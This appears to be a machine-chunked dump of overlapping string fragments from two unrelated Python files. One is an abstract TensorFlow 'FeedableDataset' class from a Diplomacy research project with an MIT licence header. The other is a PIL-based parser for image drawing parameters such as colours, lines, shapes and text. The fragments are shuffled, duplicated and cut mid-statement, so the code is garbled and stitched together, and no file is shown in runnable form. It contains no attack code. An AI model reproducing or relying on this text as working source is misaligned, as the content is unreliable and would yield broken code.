dataset_builder self.cluster_config = cluster_config", "session: The TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def", "\"\"\" raise NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts the dataset :param session:", "dataset has been started \"\"\" return self._is_started @property def is_initialized(self): \"\"\" Determines if", "# Converting sets to lists if isinstance(item[feature], set): item[feature] = list(item[feature]) # Var", "a SessionRunHook for the MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops the dataset", "for the MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops the dataset \"\"\" self._is_closing", "Determines if the dataset has been started \"\"\" return self._is_started @property def is_initialized(self):", "**kwargs) def prepare_item(self, item): \"\"\" Makes sure the item respects the required protofields", "= None self.iterator = None self._is_started = False self._is_initialized = False self._is_closing =", "configuration will be used for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig", "np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature]", "from the model if an error is encountered. :return: A tornado.concurrent.Future that will", "permit persons to whom the Software is # furnished to do so, subject", "copy of this software and associated documentation files (the \"Software\"), # to deal", "# Will be used as default if features are missing self.session = None", "without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense,", "model if an error is encountered. :return: A tornado.concurrent.Future that will be set", "queue where to put the item :param item: A dictionary with the fields", "item): \"\"\" Makes sure the item respects the required protofields and casts/pads the", "required for that queue :param retry_on_failure: Boolean that indicates to retry querying from", "The name of the queue where to put the item :param item: A", "= list(item[feature]) # Var Len - Converting and flattening # Scalar - Just", "or if it is a remote (RPC) dataset \"\"\" raise NotImplementedError() @property def", "protofields and casts/pads the item accordingly \"\"\" # Checking all features in items,", "of a name using item as inout :param queue_name: The name of the", "are missing self.session = None self.iterator = None self._is_started = False self._is_initialized =", "is a generic feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param", "diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features =", "Software. # ============================================================================== \"\"\" Feedable Dataset - Abstract class responsible for feeding data", "dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts the dataset :param", "queue_name: The name of the queue where to put the item :param item:", "included in all # copies or substantial portions of the Software. # ==============================================================================", "= self.proto_fields[feature] # Converting sets to lists if isinstance(item[feature], set): item[feature] = list(item[feature])", "# The above copyright notice and this permission notice shall be included in", "@abstractmethod def build(self): \"\"\" Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self,", "the dataset is closing \"\"\" return self._is_closing @abstractmethod def build(self): \"\"\" Builds the", "above copyright notice and this permission notice shall be included in all #", "proto_field.shape), proto_field.dtype) # Returning item return item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True,", "become available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook for", "self.iterator = None self._is_started = False self._is_initialized = False self._is_closing = False def", "NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook for the MonitoredTrainingSession object \"\"\"", "raise NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts the dataset :param session: The", "return item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs", "indicates to retry querying from the model if an error is encountered. :return:", "Initializes the dataset (and its iterator) :param session: The TensorFlow session to use.", "Computes the outputs of a name using item as inout :param queue_name: The", "all features in items, padding them and converting them to the right dtype", "associated documentation files (the \"Software\"), # to deal in the Software without restriction,", "and associated documentation files (the \"Software\"), # to deal in the Software without", "in the Software without restriction, including without limitation the # rights to use,", "dictionary with the fields required for that queue :param retry_on_failure: Boolean that indicates", "with the results when they become available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook():", "converting # Fixed Len - Padding and converting if proto_field.dtype is None: continue", "np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item", "Padding and converting if proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField): item[feature] =", "session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs):", "- <NAME> # # NOTICE: Permission is hereby granted, free of charge, to", "def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of a name", "self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be used", "instance of `BaseBuilder` containing the proto-fields and generation methods :param cluster_config: Optional. If", "this permission notice shall be included in all # copies or substantial portions", "Determines if the iterator is initialized \"\"\" return self._is_initialized @property def is_closing(self): \"\"\"", "dataset can support an iterator or if it is a remote (RPC) dataset", "the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes sure", "remote (RPC) dataset \"\"\" raise NotImplementedError() @property def is_started(self): \"\"\" Determines if the", "Checking all features in items, padding them and converting them to the right", "# a copy of this software and associated documentation files (the \"Software\"), #", "to any person obtaining # a copy of this software and associated documentation", "is hereby granted, free of charge, to any person obtaining # a copy", "# Scalar - Just converting # Fixed Len - Padding and converting if", "that indicates to retry querying from the model if an error is encountered.", "def prepare_item(self, item): \"\"\" Makes sure the item respects the required protofields and", "<NAME> # # NOTICE: Permission is hereby granted, free of charge, to any", "inout :param queue_name: The name of the queue where to put the item", "============================================================================== # Copyright 2019 - <NAME> # # NOTICE: Permission is hereby granted,", "to deal in the Software without restriction, including without limitation the # rights", "following conditions: # # The above copyright notice and this permission notice shall", "logging import numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model", "of the Software, and to permit persons to whom the Software is #", "item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of a name using item as", "the fields required for that queue :param retry_on_failure: Boolean that indicates to retry", "\"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance of `BaseBuilder`", "= False self._is_closing = False def __del__(self): \"\"\" Destructor \"\"\" self.close() @property def", "features in items, padding them and converting them to the right dtype for", "None: continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature]", "the item accordingly \"\"\" # Checking all features in items, padding them and", "in self.proto_fields, 'Feature %s is not in proto fields.' % feature proto_field =", "item[feature] = list(item[feature]) # Var Len - Converting and flattening # Scalar -", ":type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields)", "free of charge, to any person obtaining # a copy of this software", "============================================================================== \"\"\" Feedable Dataset - Abstract class responsible for feeding data inside a", "respects the required protofields and casts/pads the item accordingly \"\"\" # Checking all", "<filename>diplomacy_research/models/datasets/feedable_dataset.py # ============================================================================== # Copyright 2019 - <NAME> # # NOTICE: Permission is", "Will be used as default if features are missing self.session = None self.iterator", "(the \"Software\"), # to deal in the Software without restriction, including without limitation", "and/or # sell copies of the Software, and to permit persons to whom", "put the item :param item: A dictionary with the fields required for that", "started \"\"\" return self._is_started @property def is_initialized(self): \"\"\" Determines if the iterator is", "be used for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder", "MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops the dataset \"\"\" self._is_closing = True", "Converting sets to lists if isinstance(item[feature], set): item[feature] = list(item[feature]) # Var Len", "# Returning item return item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\"", "rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies", "Feedable Dataset - Abstract class responsible for feeding data inside a model \"\"\"", "LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic feedable dataset", "is a remote (RPC) dataset \"\"\" raise NotImplementedError() @property def is_started(self): \"\"\" Determines", "session): \"\"\" Starts the dataset :param session: The TensorFlow session to use. :type", "to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\"", "assert feature in self.proto_fields, 'Feature %s is not in proto fields.' % feature", "def __del__(self): \"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines if the", "raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes the dataset (and its iterator)", "self._is_closing = False def __del__(self): \"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\"", "generation methods :param cluster_config: Optional. If set, the cluster configuration will be used", "copyright notice and this permission notice shall be included in all # copies", "\"\"\" Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts", "item return item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the", ":param session: The TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError()", "\"\"\" Makes sure the item respects the required protofields and casts/pads the item", "feature in self.proto_fields, 'Feature %s is not in proto fields.' % feature proto_field", "NOTICE: Permission is hereby granted, free of charge, to any person obtaining #", "proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not", "**kwargs): \"\"\" Computes the outputs of a name using item as inout :param", "where to put the item :param item: A dictionary with the fields required", "missing self.session = None self.iterator = None self._is_started = False self._is_initialized = False", "queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of a name using item", "iterator) :param session: The TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise", "start(self, session): \"\"\" Starts the dataset :param session: The TensorFlow session to use.", "feeding data inside a model \"\"\" from abc import ABCMeta, abstractmethod import logging", "if isinstance(item[feature], set): item[feature] = list(item[feature]) # Var Len - Converting and flattening", "@abstractmethod def initialize(self, session): \"\"\" Initializes the dataset (and its iterator) :param session:", "lists if isinstance(item[feature], set): item[feature] = list(item[feature]) # Var Len - Converting and", "def make_session_run_hook(): \"\"\" Builds a SessionRunHook for the MonitoredTrainingSession object \"\"\" def close(self):", "sets to lists if isinstance(item[feature], set): item[feature] = list(item[feature]) # Var Len -", "\"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\"", "if proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif", "= BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be used as default if features", "Constructor :param dataset_builder: An instance of `BaseBuilder` containing the proto-fields and generation methods", "limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or", "features are missing self.session = None self.iterator = None self._is_started = False self._is_initialized", "as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list #", "use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls", "@abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of a", "the results when they become available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\"", "% feature proto_field = self.proto_fields[feature] # Converting sets to lists if isinstance(item[feature], set):", "\"\"\" Builds a SessionRunHook for the MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops", "merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to", "the Software is # furnished to do so, subject to the following conditions:", "subject to the following conditions: # # The above copyright notice and this", "= np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField):" ]
[ "def analysis(obj): params = dict() params['size'] = size(obj) params['rgb'] = color(obj) params['lines'] =", "params['opacity'] = opacity(obj) params['original'] = o if (o := obj.get('original')) else False params['colour']", "try: line_arg = i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]),", "Exception as ex: print(str(ex)) return shapes def text(obj): texts = list() if texts_args", "len(data) >= 2: return [data[0], data[1]] return None def colour(obj): data = params.split(',')", "from PIL import ImageFont def analysis(obj): params = dict() params['size'] = size(obj) params['rgb']", "7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def store(obj):", "[int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None def store(obj): bg =", "'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] = store(obj) params['point'] =", "[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >=", "7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6:", "except Exception as ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes = list()", "obj.get('store') else obj.get('store').split(',') if bg: if len(bg) >= 2: bg_args = [bg[0], bg[1]]", "= lines_args.split(';') for i in line_args: try: line_arg = i.split(',') if len(line_arg) >=", "[data[0], data[1]] return None def colour(obj): data = params.split(',') if (params := obj.get('colour'))", ">= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >=", "params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] =", "bg = None if not obj.get('store') else obj.get('store').split(',') if bg: if len(bg) >=", "int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)])", "else None return None def album(obj): data = params.split(',') if (params := obj.get('album'))", "= rgb[0] if not obj.get('r') else obj.get('r') rgb[1] = rgb[1] if not obj.get('g')", "int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])),", "2: return [data[0], data[1]] return None def colour(obj): data = params.split(',') if (params", "PIL import ImageFont def analysis(obj): params = dict() params['size'] = size(obj) params['rgb'] =", "None: return op if 0 <= (op := int(a)) <= 255 else None", "ex: print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args :=", "if not obj.get('g') else obj.get('g') rgb[2] = rgb[2] if not obj.get('b') else obj.get('b')", "(int(data[4]), int(data[5]), int(data[6]))] return None def store(obj): bg = None if not obj.get('store')", "# ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in text_args: text_arg =", "= color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles')", "2: bg_args = [bg[0], bg[1]] return bg_args if len(bg) >= 1: bg_args =", ">= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0, 0)])", "shapes def text(obj): texts = list() if texts_args := obj.get('texts'): text_args = texts_args.split(';')", "a := o if (o := obj.get('a')) else None: return op if 0", "shape_args: try: shape_arg = i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]),", ":= obj.get('texts'): text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for", "obj.get('lines'): line_args = lines_args.split(';') for i in line_args: try: line_arg = i.split(',') if", "if data and len(data) >= 2: return [data[0], data[1]] return None def colour(obj):", "text_args: text_arg = i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]),", "height = int(obj.get('height') or obj.get('h') or '300') return width, height def color(obj): rgb", "int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append(", "data = params.split(',') if (params := obj.get('album')) else None if data and len(data)", "opacity(obj) params['original'] = o if (o := obj.get('original')) else False params['colour'] = colour(obj)", ">= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if len(text_args) >=", "else None if data and len(data) >= 2: return [data[0], data[1]] return None", "= list() if texts_args := obj.get('texts'): text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf'", "= point(obj) params['opacity'] = opacity(obj) params['original'] = o if (o := obj.get('original')) else", "int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]),", "= opacity(obj) params['original'] = o if (o := obj.get('original')) else False params['colour'] =", "colour(obj) params['album'] = album(obj) return params def opacity(obj): if a := o if", "= int(obj.get('width') or obj.get('w') or '400') height = int(obj.get('height') or obj.get('h') or '300')", "def store(obj): bg = None if not obj.get('store') else obj.get('store').split(',') if bg: if", "if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0, 0), ImageFont.truetype(ttf, 30)]) return", "album(obj) return params def opacity(obj): if a := o if (o := obj.get('a'))", "len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))] return None", "for i in shape_args: try: shape_arg = i.split(',') if len(shape_arg) >= 10: shapes.append(", "params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] = store(obj) params['point'] = point(obj)", "7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]),", "not obj.get('store') else obj.get('store').split(',') if bg: if len(bg) >= 2: bg_args = [bg[0],", "params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles') params['texts'] =", "obj.get('store').split(',') if bg: if len(bg) >= 2: bg_args = [bg[0], bg[1]] return bg_args", "(int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]),", "int(data[6]))] return None def store(obj): bg = None if not obj.get('store') else obj.get('store').split(',')", "if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]),", "False params['colour'] = colour(obj) params['album'] = album(obj) return params def opacity(obj): if a", "int(obj.get('height') or obj.get('h') or '300') return width, height def color(obj): rgb = (obj.get('rgb')", "list() if texts_args := obj.get('texts'): text_args = texts_args.split(';') # ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf", "len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0, 0), ImageFont.truetype(ttf, 30)]) return texts", "int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception as ex: print(str(ex)) return lines", "data and len(data) >= 2: return [data[0], data[1]] return None def colour(obj): data", "in text_args: text_arg = i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]),", "= ellipse_and_rectangle(obj, 'rectangles') params['texts'] = text(obj) params['store'] = store(obj) params['point'] = point(obj) params['opacity']", "op if 0 <= (op := int(a)) <= 255 else None return None", "int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]),", "bg_args else: return None def point(obj): return None if not obj.get('point') else float(obj.get('point'))", "def size(obj): width = int(obj.get('width') or obj.get('w') or '400') height = int(obj.get('height') or", "= (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r') else obj.get('r') rgb[1]", "ttf = '/project/Image/font.ttf' for i in text_args: text_arg = i.split(',') if len(text_arg) >=", "= int(obj.get('height') or obj.get('h') or '300') return width, height def color(obj): rgb =", "(int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))]) elif len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]),", "shape): shapes = list() if shapes_args := obj.get(shape): shape_args = shapes_args.split(';') for i", "obj.get('point') else float(obj.get('point')) def size(obj): width = int(obj.get('width') or obj.get('w') or '400') height", "elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])), ImageFont.truetype(ttf, 30)]) if", "import ImageFont def analysis(obj): params = dict() params['size'] = size(obj) params['rgb'] = color(obj)", "lines = list() if lines_args := obj.get('lines'): line_args = lines_args.split(';') for i in", "'0'] return bg_args else: return None def point(obj): return None if not obj.get('point')", "i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])),", "ImageFont.truetype(ttf, 30)]) if len(text_args) >= 3: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0, 0), ImageFont.truetype(ttf,", "album(obj): data = params.split(',') if (params := obj.get('album')) else None if data and", "= store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj) params['original'] = o if (o", "line_args: try: line_arg = i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])),", "if (o := obj.get('original')) else False params['colour'] = colour(obj) params['album'] = album(obj) return", "int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >= 4: shapes.append(", "int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0, 0)]) except Exception as ex: print(str(ex))", "len(shape_arg) >= 7: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (0, 0,", "params['point'] = point(obj) params['opacity'] = opacity(obj) params['original'] = o if (o := obj.get('original'))", "return width, height def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0]", "try: shape_arg = i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])),", "int(shape_arg[3])), (0, 0, 0), (0, 0, 0)]) except Exception as ex: print(str(ex)) return", "'400') height = int(obj.get('height') or obj.get('h') or '300') return width, height def color(obj):", "None if not obj.get('store') else obj.get('store').split(',') if bg: if len(bg) >= 2: bg_args", "rgb[1] if not obj.get('g') else obj.get('g') rgb[2] = rgb[2] if not obj.get('b') else", ":= obj.get('a')) else None: return op if 0 <= (op := int(a)) <=", "return params def opacity(obj): if a := o if (o := obj.get('a')) else", ":= obj.get(shape): shape_args = shapes_args.split(';') for i in shape_args: try: shape_arg = i.split(',')", "size(obj) params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses') params['rectangles'] =", "(params := obj.get('colour')) else None if data and len(data) >= 7: return [int(data[0]),", "if data and len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]),", "shapes_args.split(';') for i in shape_args: try: shape_arg = i.split(',') if len(shape_arg) >= 10:", "int(text_arg[5])), ImageFont.truetype(ttf, int(text_arg[6]))]) elif len(text_arg) >= 6: texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (int(text_arg[3]), int(text_arg[3]), int(text_arg[5])),", "else obj.get('b') return int(rgb[0]), int(rgb[1]), int(rgb[2]) def line(obj): lines = list() if lines_args", "(0, 0, 0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0,", "= i.split(',') if len(shape_arg) >= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]),", "rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r') else obj.get('r')", "for i in text_args: text_arg = i.split(',') if len(text_arg) >= 7: texts.append([(int(text_arg[0]), int(text_arg[1])),", "data = params.split(',') if (params := obj.get('colour')) else None if data and len(data)", "lines_args := obj.get('lines'): line_args = lines_args.split(';') for i in line_args: try: line_arg =", "int(shape_arg[6])), (0, 0, 0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])),", "'300') return width, height def color(obj): rgb = (obj.get('rgb') or '200,200,200').split(',') rgb[0] =", "255 else None return None def album(obj): data = params.split(',') if (params :=", "float(obj.get('point')) def size(obj): width = int(obj.get('width') or obj.get('w') or '400') height = int(obj.get('height')", "if a := o if (o := obj.get('a')) else None: return op if", "or obj.get('h') or '300') return width, height def color(obj): rgb = (obj.get('rgb') or", "data and len(data) >= 7: return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))]", "ex: print(str(ex)) return shapes def text(obj): texts = list() if texts_args := obj.get('texts'):", "print(str(ex)) return lines def ellipse_and_rectangle(obj, shape): shapes = list() if shapes_args := obj.get(shape):", ">= 2: return [data[0], data[1]] return None def colour(obj): data = params.split(',') if", "0, 0)]) elif len(shape_arg) >= 4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0,", "if (o := obj.get('a')) else None: return op if 0 <= (op :=", "= list() if lines_args := obj.get('lines'): line_args = lines_args.split(';') for i in line_args:", "0, 0)]) except Exception as ex: print(str(ex)) return shapes def text(obj): texts =", "def colour(obj): data = params.split(',') if (params := obj.get('colour')) else None if data", "int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)])", "= None if not obj.get('store') else obj.get('store').split(',') if bg: if len(bg) >= 2:", "except Exception as ex: print(str(ex)) return shapes def text(obj): texts = list() if", "'200,200,200').split(',') rgb[0] = rgb[0] if not obj.get('r') else obj.get('r') rgb[1] = rgb[1] if", "point(obj) params['opacity'] = opacity(obj) params['original'] = o if (o := obj.get('original')) else False", "int(obj.get('width') or obj.get('w') or '400') height = int(obj.get('height') or obj.get('h') or '300') return", "ttf = '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in text_args: text_arg = i.split(',')", "i in line_args: try: line_arg = i.split(',') if len(line_arg) >= 7: lines.append([(int(line_arg[0]), int(line_arg[1]),", ">= 10: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])), (int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))])", ">= 7: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))]) elif len(line_arg) >= 4:", "params['size'] = size(obj) params['rgb'] = color(obj) params['lines'] = line(obj) params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses')", "params['store'] = store(obj) params['point'] = point(obj) params['opacity'] = opacity(obj) params['original'] = o if", "bg_args = [bg[0], '0'] return bg_args else: return None def point(obj): return None", "return [data[0], data[1]] return None def colour(obj): data = params.split(',') if (params :=", "len(line_arg) >= 4: lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)]) except Exception as", "obj.get('g') else obj.get('g') rgb[2] = rgb[2] if not obj.get('b') else obj.get('b') return int(rgb[0]),", "4: shapes.append( [(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])), (0, 0, 0), (0, 0, 0)]) except", "= '/home/ahri/code/AhriImage/Image/font.ttf' ttf = '/project/Image/font.ttf' for i in text_args: text_arg = i.split(',') if", "o if (o := obj.get('original')) else False params['colour'] = colour(obj) params['album'] = album(obj)", "else None: return op if 0 <= (op := 